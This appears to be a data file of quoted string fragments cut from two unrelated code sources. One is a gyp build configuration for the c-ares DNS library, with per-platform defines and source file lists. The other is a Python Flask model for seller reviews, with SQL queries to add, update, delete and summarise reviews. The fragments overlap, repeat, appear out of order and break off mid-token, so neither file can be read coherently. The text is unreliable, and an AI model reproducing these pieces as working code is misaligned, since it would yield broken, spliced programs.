"{ 'include_dirs': [ 'config/freebsd' ], 'sources': [ 'config/freebsd/ares_config.h' ] }], [ 'OS==\"openbsd\"', {",
"], 'defines': [ # Support for malloc(0) '_LINUX_SOURCE_COMPAT=1', '_ALL_SOURCE=1'], }], ['OS==\"solaris\"', { 'defines':",
"'OS==\"win\"', { 'defines': [ 'CARES_PULL_WS2TCPIP_H=1', '_WINSOCK_DEPRECATED_NO_WARNINGS', ], 'include_dirs': [ 'config/win32' ], 'sources': [",
"{ 'target_name': 'cares', 'type': '<(library)', 'include_dirs': [ 'include', 'src/lib' ], 'direct_dependent_settings': { 'include_dirs':",
"'-lws2_32.lib', '-liphlpapi.lib' ], }, { # Not Windows i.e. POSIX 'cflags': [ '-g',",
"[ 'config/linux/ares_config.h' ] }], [ 'OS==\"mac\"', { 'include_dirs': [ 'config/darwin' ], 'sources': [",
"'sources': [ 'config/android/ares_config.h' ], }], [ 'OS==\"solaris\"', { 'include_dirs': [ 'config/sunos' ], 'sources':",
"'src/lib/ares_expand_name.c', 'src/lib/ares_expand_string.c', 'src/lib/ares_fds.c', 'src/lib/ares_free_hostent.c', 'src/lib/ares_free_string.c', 'src/lib/ares_freeaddrinfo.c', 'src/lib/ares_getenv.h', 'src/lib/ares_getaddrinfo.c', 'src/lib/ares_gethostbyaddr.c', 'src/lib/ares_gethostbyname.c', 'src/lib/ares__get_hostent.c', 'src/lib/ares_getnameinfo.c', 'src/lib/ares_getsock.c',",
"'-Wextra', '-Wno-unused-parameter' ], 'defines': [ 'HAVE_CONFIG_H' ], }], [ 'OS not in \"win",
"'src/lib/ares_query.c', 'src/lib/ares__read_line.c', 'src/lib/ares__readaddrinfo.c', 'src/lib/ares_search.c', 'src/lib/ares_send.c', 'src/lib/ares_setup.h', 'src/lib/ares__sortaddrinfo.c', 'src/lib/ares_strcasecmp.c', 'src/lib/ares_strcasecmp.h', 'src/lib/ares_strdup.c', 'src/lib/ares_strdup.h', 'src/lib/ares_strerror.c', 'src/lib/ares_strsplit.c',",
"'src/lib/ares_strdup.c', 'src/lib/ares_strdup.h', 'src/lib/ares_strerror.c', 'src/lib/ares_strsplit.c', 'src/lib/ares_timeout.c', 'src/lib/ares__timeval.c', 'src/lib/ares_version.c', 'src/lib/ares_writev.c', 'src/lib/ares_writev.h', 'src/lib/bitncmp.c', 'src/lib/bitncmp.h', 'src/lib/inet_net_pton.c', 'src/lib/inet_ntop.c',",
"{ # Not Windows i.e. POSIX 'cflags': [ '-g', '-pedantic', '-Wall', '-Wextra', '-Wno-unused-parameter'",
"[ 'OS==\"linux\"', { 'include_dirs': [ 'config/linux' ], 'sources': [ 'config/linux/ares_config.h' ] }], [",
"'src/lib/ares__parse_into_addrinfo.c', 'src/lib/ares_parse_aaaa_reply.c', 'src/lib/ares_parse_a_reply.c', 'src/lib/ares_parse_caa_reply.c', 'src/lib/ares_parse_mx_reply.c', 'src/lib/ares_parse_naptr_reply.c', 'src/lib/ares_parse_ns_reply.c', 'src/lib/ares_parse_ptr_reply.c', 'src/lib/ares_parse_soa_reply.c', 'src/lib/ares_parse_srv_reply.c', 'src/lib/ares_parse_txt_reply.c', 'src/lib/ares_platform.h', 'src/lib/ares_private.h',",
"'src/lib/ares_cancel.c', 'src/lib/ares__close_sockets.c', 'src/lib/ares_create_query.c', 'src/lib/ares_data.c', 'src/lib/ares_data.h', 'src/lib/ares_destroy.c', 'src/lib/ares_expand_name.c', 'src/lib/ares_expand_string.c', 'src/lib/ares_fds.c', 'src/lib/ares_free_hostent.c', 'src/lib/ares_free_string.c', 'src/lib/ares_freeaddrinfo.c', 'src/lib/ares_getenv.h',",
"] }], [ 'OS==\"android\"', { 'include_dirs': [ 'config/android' ], 'sources': [ 'config/android/ares_config.h' ],",
"'config/linux/ares_config.h' ] }], [ 'OS==\"mac\"', { 'include_dirs': [ 'config/darwin' ], 'sources': [ 'config/darwin/ares_config.h'",
"], }], [ 'OS not in \"win android\"', { 'cflags': [ '--std=gnu89' ],",
"'include_dirs': [ 'config/win32' ], 'sources': [ 'src/lib/config-win32.h', 'src/lib/windows_port.c', 'src/lib/ares_getenv.c', 'src/lib/ares_iphlpapi.h', 'src/lib/ares_platform.c' ], 'libraries':",
"[ 'config/freebsd/ares_config.h' ] }], [ 'OS==\"openbsd\"', { 'include_dirs': [ 'config/openbsd' ], 'sources': [",
"'src/lib/ares__sortaddrinfo.c', 'src/lib/ares_strcasecmp.c', 'src/lib/ares_strcasecmp.h', 'src/lib/ares_strdup.c', 'src/lib/ares_strdup.h', 'src/lib/ares_strerror.c', 'src/lib/ares_strsplit.c', 'src/lib/ares_timeout.c', 'src/lib/ares__timeval.c', 'src/lib/ares_version.c', 'src/lib/ares_writev.c', 'src/lib/ares_writev.h', 'src/lib/bitncmp.c',",
"], }], [ 'OS==\"linux\"', { 'include_dirs': [ 'config/linux' ], 'sources': [ 'config/linux/ares_config.h' ]",
"'src/lib/ares_nowarn.h', 'src/lib/ares_options.c', 'src/lib/ares__parse_into_addrinfo.c', 'src/lib/ares_parse_aaaa_reply.c', 'src/lib/ares_parse_a_reply.c', 'src/lib/ares_parse_caa_reply.c', 'src/lib/ares_parse_mx_reply.c', 'src/lib/ares_parse_naptr_reply.c', 'src/lib/ares_parse_ns_reply.c', 'src/lib/ares_parse_ptr_reply.c', 'src/lib/ares_parse_soa_reply.c', 'src/lib/ares_parse_srv_reply.c', 'src/lib/ares_parse_txt_reply.c',",
"'config/aix' ], 'sources': [ 'config/aix/ares_config.h' ], 'defines': [ # Support for malloc(0) '_LINUX_SOURCE_COMPAT=1',",
"}], [ 'OS not in \"win android\"', { 'cflags': [ '--std=gnu89' ], }],",
"'src/lib/ares_gethostbyaddr.c', 'src/lib/ares_gethostbyname.c', 'src/lib/ares__get_hostent.c', 'src/lib/ares_getnameinfo.c', 'src/lib/ares_getsock.c', 'src/lib/ares_init.c', 'src/lib/ares_ipv6.h', 'src/lib/ares_library_init.c', 'src/lib/ares_library_init.h', 'src/lib/ares_llist.c', 'src/lib/ares_llist.h', 'src/lib/ares_mkquery.c', 'src/lib/ares_nameser.h',",
"[ 'HAVE_CONFIG_H' ], }], [ 'OS not in \"win android\"', { 'cflags': [",
"[ 'OS not in \"win android\"', { 'cflags': [ '--std=gnu89' ], }], [",
"'src/lib/ares_freeaddrinfo.c', 'src/lib/ares_getenv.h', 'src/lib/ares_getaddrinfo.c', 'src/lib/ares_gethostbyaddr.c', 'src/lib/ares_gethostbyname.c', 'src/lib/ares__get_hostent.c', 'src/lib/ares_getnameinfo.c', 'src/lib/ares_getsock.c', 'src/lib/ares_init.c', 'src/lib/ares_ipv6.h', 'src/lib/ares_library_init.c', 'src/lib/ares_library_init.h', 'src/lib/ares_llist.c',",
"] }, { 'defines': [ 'CARES_BUILDING_LIBRARY' ] }], [ 'OS==\"win\"', { 'defines': [",
"'src/lib/ares_options.c', 'src/lib/ares__parse_into_addrinfo.c', 'src/lib/ares_parse_aaaa_reply.c', 'src/lib/ares_parse_a_reply.c', 'src/lib/ares_parse_caa_reply.c', 'src/lib/ares_parse_mx_reply.c', 'src/lib/ares_parse_naptr_reply.c', 'src/lib/ares_parse_ns_reply.c', 'src/lib/ares_parse_ptr_reply.c', 'src/lib/ares_parse_soa_reply.c', 'src/lib/ares_parse_srv_reply.c', 'src/lib/ares_parse_txt_reply.c', 'src/lib/ares_platform.h',",
"'defines': [ 'CARES_PULL_WS2TCPIP_H=1', '_WINSOCK_DEPRECATED_NO_WARNINGS', ], 'include_dirs': [ 'config/win32' ], 'sources': [ 'src/lib/config-win32.h', 'src/lib/windows_port.c',",
"}], [ 'OS==\"android\"', { 'include_dirs': [ 'config/android' ], 'sources': [ 'config/android/ares_config.h' ], }],",
"{ 'include_dirs': [ 'include', 'src/lib' ] }, 'sources': [ 'include/ares.h', 'include/ares_dns.h', 'include/ares_rules.h', 'include/ares_version.h',",
"'OS not in \"win android\"', { 'cflags': [ '--std=gnu89' ], }], [ 'OS==\"linux\"',",
"'target_name': 'cares', 'type': '<(library)', 'include_dirs': [ 'include', 'src/lib' ], 'direct_dependent_settings': { 'include_dirs': [",
"'include_dirs': [ 'config/openbsd' ], 'sources': [ 'config/openbsd/ares_config.h' ] }], [ 'OS==\"android\"', { 'include_dirs':",
"'defines': [ 'HAVE_CONFIG_H' ], }], [ 'OS not in \"win android\"', { 'cflags':",
"[ 'CARES_STATICLIB' ] }, { 'defines': [ 'CARES_BUILDING_LIBRARY' ] }], [ 'OS==\"win\"', {",
"}], [ 'OS==\"linux\"', { 'include_dirs': [ 'config/linux' ], 'sources': [ 'config/linux/ares_config.h' ] }],",
"'src/lib/ares_llist.c', 'src/lib/ares_llist.h', 'src/lib/ares_mkquery.c', 'src/lib/ares_nameser.h', 'src/lib/ares_nowarn.c', 'src/lib/ares_nowarn.h', 'src/lib/ares_options.c', 'src/lib/ares__parse_into_addrinfo.c', 'src/lib/ares_parse_aaaa_reply.c', 'src/lib/ares_parse_a_reply.c', 'src/lib/ares_parse_caa_reply.c', 'src/lib/ares_parse_mx_reply.c', 'src/lib/ares_parse_naptr_reply.c',",
"[ 'OS==\"openbsd\"', { 'include_dirs': [ 'config/openbsd' ], 'sources': [ 'config/openbsd/ares_config.h' ] }], [",
"'libraries': [ '-lws2_32.lib', '-liphlpapi.lib' ], }, { # Not Windows i.e. POSIX 'cflags':",
"], }], [ 'OS==\"solaris\"', { 'include_dirs': [ 'config/sunos' ], 'sources': [ 'config/sunos/ares_config.h' ],",
"'src/lib/ares_strerror.c', 'src/lib/ares_strsplit.c', 'src/lib/ares_timeout.c', 'src/lib/ares__timeval.c', 'src/lib/ares_version.c', 'src/lib/ares_writev.c', 'src/lib/ares_writev.h', 'src/lib/bitncmp.c', 'src/lib/bitncmp.h', 'src/lib/inet_net_pton.c', 'src/lib/inet_ntop.c', 'src/lib/ares_inet_net_pton.h', 'src/lib/setup_once.h',",
"}], ['OS==\"solaris\"', { 'defines': [ '__EXTENSIONS__', '_XOPEN_SOURCE=500' ] }] ] }, 'targets': [",
"[ 'OS==\"win\"', { 'defines': [ 'CARES_PULL_WS2TCPIP_H=1', '_WINSOCK_DEPRECATED_NO_WARNINGS', ], 'include_dirs': [ 'config/win32' ], 'sources':",
"], 'conditions': [ [ 'library==\"static_library\"', { 'defines': [ 'CARES_STATICLIB' ] }, { 'defines':",
"POSIX 'cflags': [ '-g', '-pedantic', '-Wall', '-Wextra', '-Wno-unused-parameter' ], 'defines': [ 'HAVE_CONFIG_H' ],",
"'src/lib/ares_getnameinfo.c', 'src/lib/ares_getsock.c', 'src/lib/ares_init.c', 'src/lib/ares_ipv6.h', 'src/lib/ares_library_init.c', 'src/lib/ares_library_init.h', 'src/lib/ares_llist.c', 'src/lib/ares_llist.h', 'src/lib/ares_mkquery.c', 'src/lib/ares_nameser.h', 'src/lib/ares_nowarn.c', 'src/lib/ares_nowarn.h', 'src/lib/ares_options.c',",
"['OS==\"solaris\"', { 'defines': [ '__EXTENSIONS__', '_XOPEN_SOURCE=500' ] }] ] }, 'targets': [ {",
"not in \"win android\"', { 'cflags': [ '--std=gnu89' ], }], [ 'OS==\"linux\"', {",
"], 'sources': [ 'config/darwin/ares_config.h' ] }], [ 'OS==\"freebsd\" or OS==\"dragonflybsd\"', { 'include_dirs': [",
"}] ] }, 'targets': [ { 'target_name': 'cares', 'type': '<(library)', 'include_dirs': [ 'include',",
"'src/lib/ares_fds.c', 'src/lib/ares_free_hostent.c', 'src/lib/ares_free_string.c', 'src/lib/ares_freeaddrinfo.c', 'src/lib/ares_getenv.h', 'src/lib/ares_getaddrinfo.c', 'src/lib/ares_gethostbyaddr.c', 'src/lib/ares_gethostbyname.c', 'src/lib/ares__get_hostent.c', 'src/lib/ares_getnameinfo.c', 'src/lib/ares_getsock.c', 'src/lib/ares_init.c', 'src/lib/ares_ipv6.h',",
"'src/lib/ares_llist.h', 'src/lib/ares_mkquery.c', 'src/lib/ares_nameser.h', 'src/lib/ares_nowarn.c', 'src/lib/ares_nowarn.h', 'src/lib/ares_options.c', 'src/lib/ares__parse_into_addrinfo.c', 'src/lib/ares_parse_aaaa_reply.c', 'src/lib/ares_parse_a_reply.c', 'src/lib/ares_parse_caa_reply.c', 'src/lib/ares_parse_mx_reply.c', 'src/lib/ares_parse_naptr_reply.c', 'src/lib/ares_parse_ns_reply.c',",
"'src/lib/ares_parse_mx_reply.c', 'src/lib/ares_parse_naptr_reply.c', 'src/lib/ares_parse_ns_reply.c', 'src/lib/ares_parse_ptr_reply.c', 'src/lib/ares_parse_soa_reply.c', 'src/lib/ares_parse_srv_reply.c', 'src/lib/ares_parse_txt_reply.c', 'src/lib/ares_platform.h', 'src/lib/ares_private.h', 'src/lib/ares_process.c', 'src/lib/ares_query.c', 'src/lib/ares__read_line.c', 'src/lib/ares__readaddrinfo.c',",
"}], [ 'OS==\"win\"', { 'defines': [ 'CARES_PULL_WS2TCPIP_H=1', '_WINSOCK_DEPRECATED_NO_WARNINGS', ], 'include_dirs': [ 'config/win32' ],",
"'src/lib/config-win32.h', 'src/lib/windows_port.c', 'src/lib/ares_getenv.c', 'src/lib/ares_iphlpapi.h', 'src/lib/ares_platform.c' ], 'libraries': [ '-lws2_32.lib', '-liphlpapi.lib' ], }, {",
"'_ALL_SOURCE=1'], }], ['OS==\"solaris\"', { 'defines': [ '__EXTENSIONS__', '_XOPEN_SOURCE=500' ] }] ] }, 'targets':",
"], 'sources': [ 'config/aix/ares_config.h' ], 'defines': [ # Support for malloc(0) '_LINUX_SOURCE_COMPAT=1', '_ALL_SOURCE=1'],",
"}], [ 'OS==\"freebsd\" or OS==\"dragonflybsd\"', { 'include_dirs': [ 'config/freebsd' ], 'sources': [ 'config/freebsd/ares_config.h'",
"'-Wno-unused-parameter' ], 'defines': [ 'HAVE_CONFIG_H' ], }], [ 'OS not in \"win android\"',",
"{ 'include_dirs': [ 'config/darwin' ], 'sources': [ 'config/darwin/ares_config.h' ] }], [ 'OS==\"freebsd\" or",
"'_FILE_OFFSET_BITS=64', '_GNU_SOURCE' ] }], [ 'OS==\"aix\"', { 'include_dirs': [ 'config/aix' ], 'sources': [",
"[ 'include', 'src/lib' ] }, 'sources': [ 'include/ares.h', 'include/ares_dns.h', 'include/ares_rules.h', 'include/ares_version.h', 'src/lib/ares_android.c', 'src/lib/ares_cancel.c',",
"[ 'OS==\"aix\"', { 'include_dirs': [ 'config/aix' ], 'sources': [ 'config/aix/ares_config.h' ], 'defines': [",
"'type': '<(library)', 'include_dirs': [ 'include', 'src/lib' ], 'direct_dependent_settings': { 'include_dirs': [ 'include', 'src/lib'",
"'include/ares_rules.h', 'include/ares_version.h', 'src/lib/ares_android.c', 'src/lib/ares_cancel.c', 'src/lib/ares__close_sockets.c', 'src/lib/ares_create_query.c', 'src/lib/ares_data.c', 'src/lib/ares_data.h', 'src/lib/ares_destroy.c', 'src/lib/ares_expand_name.c', 'src/lib/ares_expand_string.c', 'src/lib/ares_fds.c', 'src/lib/ares_free_hostent.c',",
"'OS==\"solaris\"', { 'include_dirs': [ 'config/sunos' ], 'sources': [ 'config/sunos/ares_config.h' ], 'direct_dependent_settings': { 'libraries':",
"[ 'config/sunos' ], 'sources': [ 'config/sunos/ares_config.h' ], 'direct_dependent_settings': { 'libraries': [ '-lsocket', '-lnsl'",
"'include_dirs': [ 'include', 'src/lib' ] }, 'sources': [ 'include/ares.h', 'include/ares_dns.h', 'include/ares_rules.h', 'include/ares_version.h', 'src/lib/ares_android.c',",
"'sources': [ 'config/darwin/ares_config.h' ] }], [ 'OS==\"freebsd\" or OS==\"dragonflybsd\"', { 'include_dirs': [ 'config/freebsd'",
"'config/openbsd/ares_config.h' ] }], [ 'OS==\"android\"', { 'include_dirs': [ 'config/android' ], 'sources': [ 'config/android/ares_config.h'",
"'src/lib/ares__close_sockets.c', 'src/lib/ares_create_query.c', 'src/lib/ares_data.c', 'src/lib/ares_data.h', 'src/lib/ares_destroy.c', 'src/lib/ares_expand_name.c', 'src/lib/ares_expand_string.c', 'src/lib/ares_fds.c', 'src/lib/ares_free_hostent.c', 'src/lib/ares_free_string.c', 'src/lib/ares_freeaddrinfo.c', 'src/lib/ares_getenv.h', 'src/lib/ares_getaddrinfo.c',",
"{ 'include_dirs': [ 'config/android' ], 'sources': [ 'config/android/ares_config.h' ], }], [ 'OS==\"solaris\"', {"
] |
[
"TABLE SellerReview ( # user_id INT NOT NULL REFERENCES Users(id), # seller_id INT",
"rows = app.db.execute(\"\"\" INSERT INTO SellerReview(user_id, seller_id, date_time, description, rating) VALUES(:user_id, :seller_id, :date_time,",
"= app.db.execute(''' SELECT user_id, seller_id, date_time, description, rating FROM SellerReview WHERE seller_id =",
"offset) # If no passed in `seller_id`, then return all reviews from that",
"passed in, return just the first element, not the list if seller_id is",
"PRIMARY KEY (user_id, seller_id) # FOREIGN KEY (user_id, seller_id) REFERENCES Purchases(uid, pid) #",
"@staticmethod def delete_review(seller_id): rows = app.db.execute(\"\"\" DELETE FROM SellerReview WHERE user_id = :user_id",
":rating) RETURNING user_id \"\"\", user_id = current_user.id, seller_id = seller_id, date_time = date_time,",
"'Done' @staticmethod def delete_review(seller_id): rows = app.db.execute(\"\"\" DELETE FROM SellerReview WHERE user_id =",
"first element, not the list if seller_id is None or user_id is None:",
"SellerReview WHERE user_id = :user_id GROUP BY user_id ''', user_id = user_id) #",
"ORDER BY date_time DESC LIMIT 10 OFFSET :offset ''', user_id = user_id, offset",
"def get(user_id, offset = 0, seller_id = None): # If no passed in",
"[SellerReview(user_id = row[0], reviews = row[1], last_review = row[2], avg_rating = row[3], exists",
"user_id) # If there exists a previous review, create the object if rows:",
"date_time, description, rating) VALUES(:user_id, :seller_id, :date_time, :description, :rating) RETURNING user_id \"\"\", user_id =",
"seller_id = seller_id) # This means that user has not bought from this",
"user_id is None: return reviews else: return reviews[0] # Otherwise, create an empty",
":seller_id RETURNING user_id \"\"\", rating = rating, description = description, date_time = date_time,",
"return 'Deleted seller review for seller ID: ' + seller_id @staticmethod def get_review_stats(user_id):",
"rows][0] # Otherwise, create an empty SellerReview object else: return (SellerReview(exists = False))",
"def __init__(self, **kwargs): self.user_id = kwargs.get('user_id') self.seller_id = kwargs.get('seller_id') self.date_time = kwargs.get('date_time') self.description",
"AND status = 'Complete' ''', buyer_id = current_user.id, seller_id = seller_id) # This",
"user_id = :user_id AND seller_id = :seller_id RETURNING user_id \"\"\", user_id = current_user.id,",
"Add in a check to see if the user has bought from this",
"= :seller_id RETURNING user_id \"\"\", user_id = current_user.id, seller_id = seller_id) # flash('Deleted",
"product ID: ' + product_id) return 'Deleted seller review for seller ID: '",
"last_review, AVG(rating) AS avg_rating FROM SellerReview WHERE user_id = :user_id GROUP BY user_id",
"COUNT(*) AS reviews, MAX(date_time) AS last_review, AVG(rating) AS avg_rating FROM SellerReview WHERE user_id",
"rating DECIMAL(10, 2) NOT NULL CHECK(rating >= 1 AND rating <= 5), #",
"pid) # ); class SellerReview: def __init__(self, **kwargs): self.user_id = kwargs.get('user_id') self.seller_id =",
"+ seller_id @staticmethod def get_review_stats(user_id): rows = app.db.execute(''' SELECT user_id, COUNT(*) AS reviews,",
"bought from this seller rows = app.db.execute(''' SELECT order_id FROM Purchases WHERE buyer_id",
"is not None: rows = app.db.execute(''' SELECT user_id, seller_id, date_time, description, rating FROM",
":user_id AND seller_id = :seller_id RETURNING user_id \"\"\", rating = rating, description =",
"# This means already a review for this seller from this user except",
"buyer_id = :buyer_id AND seller_id = :seller_id AND status = 'Complete' ''', buyer_id",
"# Add in a check to see if the user has bought from",
"@staticmethod def get_review_stats(user_id): rows = app.db.execute(''' SELECT user_id, COUNT(*) AS reviews, MAX(date_time) AS",
"has bought from this seller rows = app.db.execute(''' SELECT order_id FROM Purchases WHERE",
"REFERENCES Sellers(id), # date_time DATE NOT NULL, # description VARCHAR(256) NOT NULL, #",
"see if the user has bought from this seller rows = app.db.execute(''' SELECT",
"self.user_id = kwargs.get('user_id') self.seller_id = kwargs.get('seller_id') self.date_time = kwargs.get('date_time') self.description = kwargs.get('description', '')",
"rating) # This means already a review for this seller from this user",
"`seller_id`, then return all reviews from that user elif seller_id is None: rows",
"FROM Purchases WHERE buyer_id = :buyer_id AND seller_id = :seller_id AND status =",
"return 'Done' @staticmethod def delete_review(seller_id): rows = app.db.execute(\"\"\" DELETE FROM SellerReview WHERE user_id",
"seller_id) REFERENCES Purchases(uid, pid) # ); class SellerReview: def __init__(self, **kwargs): self.user_id =",
"SellerReview(user_id, seller_id, date_time, description, rating) VALUES(:user_id, :seller_id, :date_time, :description, :rating) RETURNING user_id \"\"\",",
"for product ID: ' + product_id) return 'Deleted seller review for seller ID:",
"description VARCHAR(256) NOT NULL, # rating DECIMAL(10, 2) NOT NULL CHECK(rating >= 1",
"row in rows][0] # Otherwise, create an empty SellerReview object else: return (SellerReview(exists",
"from that user for the given seller elif seller_id is not None: rows",
"Otherwise, create an empty SellerReview object else: return(SellerReview(exists = False)) @staticmethod def add_review(request,",
"self.avg_rating = kwargs.get('avg_rating') @staticmethod def get(user_id, offset = 0, seller_id = None): #",
"5), # PRIMARY KEY (user_id, seller_id) # FOREIGN KEY (user_id, seller_id) REFERENCES Purchases(uid,",
"self.date_time = kwargs.get('date_time') self.description = kwargs.get('description', '') self.rating = kwargs.get('rating') self.exists = kwargs.get('exists')",
"current_user.id, seller_id = seller_id) # flash('Deleted product review for product ID: ' +",
"= request.form['body'] rating = request.form['numstars'] rows = app.db.execute(\"\"\" UPDATE SellerReview SET rating =",
"rating = row[4], exists = True) for row in rows] # If no",
"reviews = [SellerReview(user_id = row[0], seller_id = row[1], date_time = row[2], description =",
"= row[2], description = row[3], rating = row[4], exists = True) for row",
"date_time = date_time, description = description, rating = rating) # This means already",
"description, date_time = date_time, user_id = current_user.id, seller_id = seller_id) return 'Done' @staticmethod",
"= :user_id AND seller_id = :seller_id RETURNING user_id \"\"\", user_id = current_user.id, seller_id",
"kwargs.get('description', '') self.rating = kwargs.get('rating') self.exists = kwargs.get('exists') self.reviews = kwargs.get('reviews') self.last_review =",
"If `seller_id` passed in, then return review from that user for the given",
"this seller if not rows: return 'you have not had a completed purchase",
"kwargs.get('rating') self.exists = kwargs.get('exists') self.reviews = kwargs.get('reviews') self.last_review = kwargs.get('last_review') self.avg_rating = kwargs.get('avg_rating')",
"return reviews else: return reviews[0] # Otherwise, create an empty SellerReview object else:",
"SellerReview ( # user_id INT NOT NULL REFERENCES Users(id), # seller_id INT NOT",
"RETURNING user_id \"\"\", user_id = current_user.id, seller_id = seller_id, date_time = date_time, description",
"= kwargs.get('date_time') self.description = kwargs.get('description', '') self.rating = kwargs.get('rating') self.exists = kwargs.get('exists') self.reviews",
"AS reviews, MAX(date_time) AS last_review, AVG(rating) AS avg_rating FROM SellerReview WHERE user_id =",
"reviews, MAX(date_time) AS last_review, AVG(rating) AS avg_rating FROM SellerReview WHERE user_id = :user_id",
"current_user from sqlalchemy import exc import datetime # Reviews of Sellers # CREATE",
"DESC LIMIT 10 OFFSET :offset ''', user_id = user_id, offset = offset) #",
"True) for row in rows][0] # Otherwise, create an empty SellerReview object else:",
"review date_time = datetime.datetime.now().strftime(\"%Y-%m-%dT%H:%M:%SZ\") description = request.form['body'] rating = request.form['numstars'] try: rows =",
"If no seller_id passed in, return just the first element, not the list",
"OFFSET :offset ''', user_id = user_id, offset = offset, seller_id = seller_id) #",
"# CREATE TABLE SellerReview ( # user_id INT NOT NULL REFERENCES Users(id), #",
"row[3], rating = row[4], exists = True) for row in rows] # If",
"SELECT user_id, seller_id, date_time, description, rating FROM SellerReview WHERE user_id = :user_id AND",
"= app.db.execute(\"\"\" INSERT INTO SellerReview(user_id, seller_id, date_time, description, rating) VALUES(:user_id, :seller_id, :date_time, :description,",
"exists a previous review, create the object if rows: return [SellerReview(user_id = row[0],",
"the object if rows: reviews = [SellerReview(user_id = row[0], seller_id = row[1], date_time",
"''', user_id = user_id, offset = offset, seller_id = seller_id) # If there",
"this seller from this user except exc.IntegrityError as e: return 'you have already",
"all reviews for that seller if user_id is None: rows = app.db.execute(''' SELECT",
"= kwargs.get('last_review') self.avg_rating = kwargs.get('avg_rating') @staticmethod def get(user_id, offset = 0, seller_id =",
"a review for this seller' return 'Done' @staticmethod def update_review(request, seller_id): # Get",
"If there exists a previous review, create the object if rows: return [SellerReview(user_id",
"date_time DESC LIMIT 10 OFFSET :offset ''', seller_id = seller_id, offset = offset)",
"LIMIT 10 OFFSET :offset ''', user_id = user_id, offset = offset, seller_id =",
"= request.form['numstars'] try: rows = app.db.execute(\"\"\" INSERT INTO SellerReview(user_id, seller_id, date_time, description, rating)",
"Sellers # CREATE TABLE SellerReview ( # user_id INT NOT NULL REFERENCES Users(id),",
"# Get information to add to review date_time = datetime.datetime.now().strftime(\"%Y-%m-%dT%H:%M:%SZ\") description = request.form['body']",
"e: return 'you have already made a review for this seller' return 'Done'",
"NULL REFERENCES Sellers(id), # date_time DATE NOT NULL, # description VARCHAR(256) NOT NULL,",
"= seller_id, offset = offset) # If no passed in `seller_id`, then return",
"review for seller ID: ' + seller_id @staticmethod def get_review_stats(user_id): rows = app.db.execute('''",
"datetime.datetime.now().strftime(\"%Y-%m-%dT%H:%M:%SZ\") description = request.form['body'] rating = request.form['numstars'] rows = app.db.execute(\"\"\" UPDATE SellerReview SET",
"delete_review(seller_id): rows = app.db.execute(\"\"\" DELETE FROM SellerReview WHERE user_id = :user_id AND seller_id",
"= 'Complete' ''', buyer_id = current_user.id, seller_id = seller_id) # This means that",
"rating) VALUES(:user_id, :seller_id, :date_time, :description, :rating) RETURNING user_id \"\"\", user_id = current_user.id, seller_id",
"WHERE user_id = :user_id GROUP BY user_id ''', user_id = user_id) # If",
"that user for the given seller elif seller_id is not None: rows =",
"not the list if seller_id is None or user_id is None: return reviews",
":user_id AND seller_id = :seller_id RETURNING user_id \"\"\", user_id = current_user.id, seller_id =",
"return(SellerReview(exists = False)) @staticmethod def add_review(request, seller_id): # Add in a check to",
"def get_review_stats(user_id): rows = app.db.execute(''' SELECT user_id, COUNT(*) AS reviews, MAX(date_time) AS last_review,",
"reviews for that seller if user_id is None: rows = app.db.execute(''' SELECT user_id,",
"seller_id, offset = offset) # If no passed in `seller_id`, then return all",
"row in rows] # If no seller_id passed in, return just the first",
"SELECT user_id, seller_id, date_time, description, rating FROM SellerReview WHERE seller_id = :seller_id ORDER",
"''', user_id = user_id, offset = offset) # If `seller_id` passed in, then",
"SET rating = :rating, description = :description, date_time = :date_time WHERE user_id =",
"in rows] # If no seller_id passed in, return just the first element,",
"This means already a review for this seller from this user except exc.IntegrityError",
"already made a review for this seller' return 'Done' @staticmethod def update_review(request, seller_id):",
"@staticmethod def update_review(request, seller_id): # Get information to add to review date_time =",
"True) for row in rows] # If no seller_id passed in, return just",
"seller_id is None or user_id is None: return reviews else: return reviews[0] #",
"FROM SellerReview WHERE user_id = :user_id AND seller_id = :seller_id LIMIT 10 OFFSET",
"# Otherwise, create an empty SellerReview object else: return(SellerReview(exists = False)) @staticmethod def",
"return all reviews from that user elif seller_id is None: rows = app.db.execute('''",
"datetime # Reviews of Sellers # CREATE TABLE SellerReview ( # user_id INT",
"# If there exists a previous review, create the object if rows: return",
"that seller if user_id is None: rows = app.db.execute(''' SELECT user_id, seller_id, date_time,",
"seller_id) # This means that user has not bought from this seller if",
"If no passed in `seller_id`, then return all reviews from that user elif",
"AS avg_rating FROM SellerReview WHERE user_id = :user_id GROUP BY user_id ''', user_id",
"KEY (user_id, seller_id) # FOREIGN KEY (user_id, seller_id) REFERENCES Purchases(uid, pid) # );",
"= rating, description = description, date_time = date_time, user_id = current_user.id, seller_id =",
"rating FROM SellerReview WHERE user_id = :user_id AND seller_id = :seller_id LIMIT 10",
"= :seller_id AND status = 'Complete' ''', buyer_id = current_user.id, seller_id = seller_id)",
"description, rating = rating) # This means already a review for this seller",
"kwargs.get('seller_id') self.date_time = kwargs.get('date_time') self.description = kwargs.get('description', '') self.rating = kwargs.get('rating') self.exists =",
"SELECT order_id FROM Purchases WHERE buyer_id = :buyer_id AND seller_id = :seller_id AND",
"user except exc.IntegrityError as e: return 'you have already made a review for",
"rows = app.db.execute(''' SELECT user_id, seller_id, date_time, description, rating FROM SellerReview WHERE user_id",
"= app.db.execute(''' SELECT user_id, COUNT(*) AS reviews, MAX(date_time) AS last_review, AVG(rating) AS avg_rating",
"NULL, # description VARCHAR(256) NOT NULL, # rating DECIMAL(10, 2) NOT NULL CHECK(rating",
"seller_id) # If there exists a previous review, create the object if rows:",
"= row[4], exists = True) for row in rows] # If no seller_id",
"in, return just the first element, not the list if seller_id is None",
"seller_id): # Get information to add to review date_time = datetime.datetime.now().strftime(\"%Y-%m-%dT%H:%M:%SZ\") description =",
"information to add to review date_time = datetime.datetime.now().strftime(\"%Y-%m-%dT%H:%M:%SZ\") description = request.form['body'] rating =",
"from flask_login import current_user from sqlalchemy import exc import datetime # Reviews of",
"for the given seller elif seller_id is not None: rows = app.db.execute(''' SELECT",
"just the first element, not the list if seller_id is None or user_id",
"current_user.id, seller_id = seller_id) return 'Done' @staticmethod def delete_review(seller_id): rows = app.db.execute(\"\"\" DELETE",
"user_id = current_user.id, seller_id = seller_id) # flash('Deleted product review for product ID:",
"flash('Deleted product review for product ID: ' + product_id) return 'Deleted seller review",
"offset = 0, seller_id = None): # If no passed in `user_id`, then",
":offset ''', user_id = user_id, offset = offset) # If `seller_id` passed in,",
"request.form['numstars'] rows = app.db.execute(\"\"\" UPDATE SellerReview SET rating = :rating, description = :description,",
"for row in rows][0] # Otherwise, create an empty SellerReview object else: return",
"user_id \"\"\", user_id = current_user.id, seller_id = seller_id, date_time = date_time, description =",
